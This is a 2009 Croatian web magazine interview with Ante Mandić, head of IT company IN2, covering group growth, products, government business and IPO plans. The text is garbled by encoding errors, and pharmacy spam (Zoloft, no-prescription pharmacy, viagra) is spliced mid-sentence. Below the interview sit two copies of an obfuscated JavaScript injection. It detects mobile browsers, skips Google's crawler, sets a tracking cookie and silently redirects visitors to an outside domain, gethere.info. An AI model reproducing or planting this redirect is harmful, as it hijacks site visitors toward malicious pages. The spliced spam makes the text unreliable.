RSS

VIP interview: Ante MandiAi??

Mon, Nov 9, 2009

VIP interview, ePoslovanje, eTrziste

eBizMags vam donosi interview sa gospodinom Antom MandiAi??em, Predsjednikom Uprave tvrtke IN2 d.o.o. Tvrtka IN2 jedna je od najveAi??ih IT tvrtki u Hrvatskoj. Razgovarali smo o planovima A?irenja poslovanja, konkurentnosti usluga i proizvoda iz ICT segmenta, oA?ekivanjima u buduAi??em razdoblju, kao i o eventualnom IPO-u tj. izlasku na burzu.

-

IN2 je jedna od najveAi??ih IT tvrtki u Hrvatskoj. Rast moA?emo djelomiA?no pripisati i akvizicijama drugih tvrtki. Koliko tvrtki je dio vaA?e grupe?

-
IN2 Grupu trenutno A?ini 9 tvrtki koje su vlasniA?ki povezane. MatiA?na tvrtka je IN2 Zagreb koja ima oko 180 uposlenih struA?njaka dok u Grupi ukupno radi trenutno oko 340 ljudi. Od tih 9 tvrtki samo su 3 akvizirane dok su preostalih 6 start-up. A?etiri su tvrtke van Hrvatske. Imamo jedno predstavniA?tvo u Makedoniji, u Skopju, koje Ai??e vjerojatno slijedeAi??e godine prerasti u tvrtku. Konsolidirani prihod grupe je negdje oko 125 mil kuna.

-

Koje su prednosti takvog rasta u odnosu na izgradnju kompetencija u vlastitoj tvrtki? Imate li planove u buduAi??nosti za daljnjim A?irenjem?

Sve tvrtke u Grupi se bave razvojem softvera i pruA?anju usluga temeljenih na vlastitom i partnerskom softveru. Djelujemo, odnosno imamo kompetencije, u nekoliko trA?iA?nih segmenata ili sektora; Financije, Javni sektor, Telco, Trgovina, Zdravstvo, …

NaA?e A?irenje ide u pravcu pojaA?avanja postojeAi??ih segmenata ili ulaskom u neka nova. Iako poslujemo u A?iroj regiji, to je joA? uvijek malo trA?iA?te pa se ne moA?e rasti fokusirajuAi??i se nego upravo obratno, A?ireAi??i se na nove trA?iA?ne segmente. Slikovito reA?eno, u plitkoj vodi je teA?ko roniti. Imamo planove za daljnje A?irenje, podjednako organski i akvizicijama te oA?ekujem da Ai??emo do kraja godine kupiti barem joA? jednu tvrtku i pribliA?iti se brojci od 400 struA?njaka, A?ime bismo postali vodeAi??a regionalna softverska kuAi??a.

-

Ante MandicKoji su vaA?i osnovni proizvodi? U A?emu je IN2 bolji od konkurencije na tim podruA?jima?

NaA?i osnovni proizvodi su u financijskom sektoru: INsurance2 za podrA?ku cjelovitog poslovanja osiguravajuAi??ih druA?tava i INvest2 za podrA?ku investicijskog bankarstva i fondovske industrije. Ovi proizvodi su rezultat naA?eg dugoroA?nog prisustva u ovim oblastima. Dugo su razvijani i u njih su ugraAi??ena naA?a poslovna znanja i iskustvo. Fleksiblni su, tehnoloA?ki moderni, prilagoAi??eni poslovanju u tranzicijskim zemljama regije i ne tako skupi. Po tome su bolji od konkurencije sa zapada dok regionalne konkurencije gotovo i da nema.

-

Danas je A?est trend da IT tvrtke postaju ICT tvrtke nudeAi??i cjelokupni raspon IT i komunikacijskih rjeA?enja. Planirate li dodati komunikacijski dio u svoj portfolio?

Mi i danas dosta radimo u telco sektoru ali moA?emo reAi??i da su to ipak poslovni softveri (retail, provizioniranje, poslovno odluA?ivanje) i vjerojatno neAi??emo dodavati taj ai??i??C- u profil naA?e Grupe. S druge strane, iskustvo u dosadaA?njem poslovanju me je nauA?ilo da nikad ne kaA?em nikad!

-
Kakav profil zaposlenika traA?ite na trA?iA?tu? Kako Ai??e reforma visokog A?kolstva utjecati na kompetencije koje traA?ite od buduAi??ih zaposlenika?

NaA? prosjeA?ni zaposlenik je zavrA?io FER, doA?ao kod nas neposredno sa fakulteta, ima oko 32 godine i cijeli svoj neveliki radni vijek je proveo kad nas. HoAi??u reAi??i, mi prvenstveno zapoA?ljavamo mlade ljude sa fakulteta. Educiramo ih u vlastitom edukacijskom centru s kojim se ponosimo i po A?emu se znatno razlikujemo od konkurencije. Intezivna edukacija traje 6 mjeseci i u cjelosti je na naA? troA?ak, A?to znaA?i da te mlade ljude od poA?etka zapoA?ljavamo i dajemo im punu plaAi??u. Do sada smo bili zadovoljni znanjem koje su dobili na naA?im fakultetima (uglavnom FER i PMF). Da li Ai??e reforma utjecati na to, joA? ne mogu reAi??i, jer joA? nisu poA?eli pristizati novi studenti, tzv. bolonjci. DoduA?e, imam sina na FER-u koji studira po bolonjskom sustavu, te imam odreAi??enu skepsu. Ai??to se nas tiA?e, reforma i nije bila potrebna, te ne znam A?to Ai??emo kao druA?tvo njome dobiti.

-
Konkurentnost hrvatskog gospodarstva je pala za desetak mjesta. Koliko su hrvatske IT tvrtke konkurentne na europskom i svjetskom trA?iA?tu? Postoje li tu razlike u odnosu na trA?iA?ta istoA?ne i trA?iA?ta zapadne Europe?

Definitvno se moA?e reAi??i da hrvatske IT tvrtke nisu konkurentne na europskom i svjetskom trA?iA?tu, a pitanje je jesu li i na regionalnom. Koji je razlog tomu? Naime, nisu dovoljno velike (malo ih ima preko 50 zaposlenika), nemaju dovoljno kapitala, imaju skupu radnu snagu u usporedbi s ostalim zemljama regije, ukljuA?ujuAi??i i Sloveniju, nemaju izvoznu strategiju, a malo ih uopAi??e ima nekakvu viziju, nemaju nikakvu pomoAi?? drA?ave (pri tome najmanje mislim na materijalnu). MoA?da sam prekritiA?an, ali me praksa, na A?alost, ne demantira. Mislim da trenutno moA?emo biti konkurentni jedino na regionalnom i istoA?nim trA?iA?tima jer smo, za razliku od zapadnih IT tvrtki, navikli poslovati u tranzicijskom tj. ekonomski nestabilnom i brzo mjenajuAi??em okruA?enju. U bliA?oj regiji (mislim na zemlje bivA?e Jugoslavije) dodatna prednost je bolje poznavanje jezika i pisma te ai??zposlovnih obiA?ajaai???.

Ante Mandic

-

Na kojim ste trA?iA?tima u regiji prisutni? Gdje vidite najveAi??i potencijal za rast?

Prisutni smo na svim trA?iA?tima regije, kako u zemljama bivA?e Jugoslavije, tako i u okolnim zemljama. Idemo tamo gdje moA?emo, ne i gdje bismo A?eljeli. HoAi??u reAi??i, moA?emo mi otvoriti ured u Bruxellesu i s time mahati u javnosti, ali Ai??emo time samo poveAi??ati troA?ak, dok je prihod upitan. Osim slabosti koje sam prethodno nabrojao, treba dodati i predrasude na koje Ai??ete naiAi??i kad je u pitanju tvrtka iz Hrvatske. Koliko god mi priA?ali da je IT industrija globalna, takvih stavova joA? itekako ima. Postoje potencijali za rast u regiji, najviA?e u zadravstvu, financijskoj industriji te javnom sektoru. Sve zemlje regije teA?e ka Europskoj Uniji, A?to Ai??e generirati potrebu za snaA?nom informatizacijom javnog sektora. Takvi infrastrukturni IT projekti najA?eA?Ai??e se financiraju iz predprisutnih fondova, A?to ih A?ini viA?e dostupnim.

-
IN2 je do sada zavrA?io mnoge projekte s drA?avom. Koliko poslovi s drA?avom A?ine u strukturi vaA?eg prihoda? Koliko se poslovanje u tom segmentu razlikuje od poslovanja s privatnim sektorom?

Tvrtke iz Grupe zaista rade puno s drA?avom i procjenjujemo da je oko 30% prihoda iz tog segmenta. KarakteristiA?no je da su to uglavnom tzv. ai??zcustom developmentai??? i na njima je zapravo IN2 stvorio znaA?ajne razvojne resurse po A?emu se razlikujemo od konkurencije. Pri tome ne mislim samo na brojnost (broj programera u Grupi je veAi??i od 250), nego i tehniA?ku ekspertizu u skoro svim znaA?ajnijim razvojnim tehnologijama (Oracle, MS, IBM, Open Source). Na velikim projektima se najA?eA?Ai??e sreAi??u sve te tehnologije i potrebno je zaista veliko iskustvo za kvalitetan razvoj.

U komercijalnom smislu poslovanje s drA?avom je jako teA?ko jer je naplata izuzetno spora. Posebno ove godine gdje veAi??inu potraA?ivanja joA? nismo naplatili. Dodatno ‘nas boli’ to A?to smo toj istoj drA?avi morali platiti PDV i akontiranu dobit (koje vjerojatno neAi??e biti) da bi uopAi??e mogli s drA?avom poslovati.

-

Je li vam je u vrijeme krize oteA?an pristup kapitalu? Koliko vam to oteA?ava daljnje A?irenje?

Na ovu krizu gledam viA?e kao na dobru priliku nego problem. Mislim da se vraAi??amo realnoj ekonomiji gdje su se svi ‘baloni’ ispuhali i gdje se moA?e razgovarati o pravim vrijednostima. Pristup kapitalu nije oteA?an, nego je on samo skuplji. To nam trenutno ne oteA?ava A?irenje jer smo bez problema naA?li banku koja nas je, temeljem pokazatelja naA?eg dosadaA?njeg poslovanja, pristala financirati. Imamo i veliku ponudu inozemnih fondova za dokapitalizacijom naA?eg poslovanja po A?emu zakljuA?ujemo da i drugi misle sliA?no nama. Dakle, kapital postoji za dobre projekte.

-
Kako gledate na primjere konsolidacije na hrvatskom IT trA?iA?tu, poput Atenta? OA?ekujete li da Ai??e se taj trend nastaviti?

Konsolidacija hrvatskog IT trA?iA?ta je neophodna i ona Ai??e se dogoditi. Nisam namjerno rekao ‘nastaviti’ jer bi to sugeriralo da se do sada dogaAi??ala, a nije. To su bili samo rijetki primjeri poput Atenta ili nas, IN2. Za Atento mogu order zoloft, buy Zoloft online. reAi??i da je neuobiA?ajen primjer konsolidacije A?to ne znaA?i da Ai??e biti i neuspjeA?an. IN2 je krenuo akvizicijama, jer smatram da je to najjednostavniji naA?in spajanja tvrtki. Kod tzv. mergera problem je uvijek u odreAi??ivanju meAi??usobnog odnosa vrijednosti izmeAi??u tvrtki koje se spajaju. PoA?to se u Hrvatskoj radi uglavnom o tzv. prvoj generaciji tvrtki, gdje su vlasnici ujedno osnivaA?i i menadA?eri, taj odnos A?esto nije jednostavan jer, osim ekonomskih parametara, u njega ulaze i tzv. emocionalni. Atento je svojim modelom povezivanja to izbjegao, ali mislim da Ai??e se takva pitanja jednom morati postaviti.

-
Planirate li izlazak na burzu?

IPO bi bio online pharmacy with no prescription. poA?eljan zavrA?etak moje karijere kao osnivaA?a i menadA?era IN2 Grupe. Da li Ai??e se to dogoditi ovisi od mnogih A?inilaca od kojih su veAi??ina vanjski. Za izlazak na burzu treba joA? rasti, restruktuirati vlasniA?ku strukturu i postiAi??i financijsku stabilnost, A?to je u nestabilnom ekonomskom okruA?enju u kojem poslujemo jako teA?ko. Zato dosta oA?ekujem od ulaska Hrvatske u EU i ako se IPO dogodi, dogodit Ai??e se nakon toga.

-
Koja su vaA?a predviAi??anja za daljnji razvoj hrvatskog IT trA?iA?ta?

Nisu baA? optimistiA?na. Bolje reA?eno, nemam pokazatelja koji bi mi bili razlog za optimizam. IT trA?iA?te je inaA?e po svojoj vokaciji globalno tako da Ai??e u buduAi??nosti i inaA?e sve manje biti ono A?to zovemo ai??zhrvatsko trA?iA?teai???. VeAi??ina IT tvrtki Ai??e se kojekakvim strateA?kim povezivanjima utopiti u postojeAi??e svjetske IT ekosustave A?ime Ai??e hrvatsko IT trA?iA?te nestati negdje iza decimalnog zareza prihoda velikih svjetskih ICT kompanija. Nadam se da Ai??e biti izuzetaka, ali oni neAi??e znaA?ajnije utjecati na trA?iA?te. Hrvatska niA?ta ne A?ini da tako ne bude. Ne postoji strategija razvoja hrvatske ICT industrije, samo trA?iA?te preferira strane tvrtke vjerujuAi??i. Volio bih da grijeA?im.

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( buy 100 ml viagra. i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

Rating 4.50 out of 5
[?]
, , , , , ,

Autor teksta:

Marko Lackovic - ukupno napisanih 44 tekstova na eBizMags.

Dodiplomski studij završio je na Fakultetu elektrotehnike i računarstva u Zagrebu, na kojem je stekao magistarsku i doktorsku titulu sa specijalizacijom u području telekomunikacija i informatike. Također je završio poslijediplomski MBA studij na Ekonomskom fakultetu u Zagrebu, pri čemu su mu glavni interesi bili strateški menadžment, te menadžment znanja. Svoju istraživačku karijeru započeo na Fakultetu elektrotehnike i računarstva u Zagrebu i na Swiss Federal Institute of Technology (EPFL) u Švicarskoj, a stečena znanja primjenjuje u R&D centru kompanije Ericsson Nikola Tesla d.d. u Zagrebu. Karijeru nastavlja na menadžerskim pozicijama kao voditelj prodaje u kompaniji Huawei Technologies d.o.o., te direktor prodaje u firmi Atento d.o.o. Sudjelovao je u nekoliko istraživačkih projekata Europske unije, te je napisao preko 30 znanstvenih radova. www.markolackovic.com Nadalje, suvlasnik je prvog Internet magazina u JIE regiji s područja e-poslovanja www.eBizMags.com

Kontaktiraj autora

Vas Komentar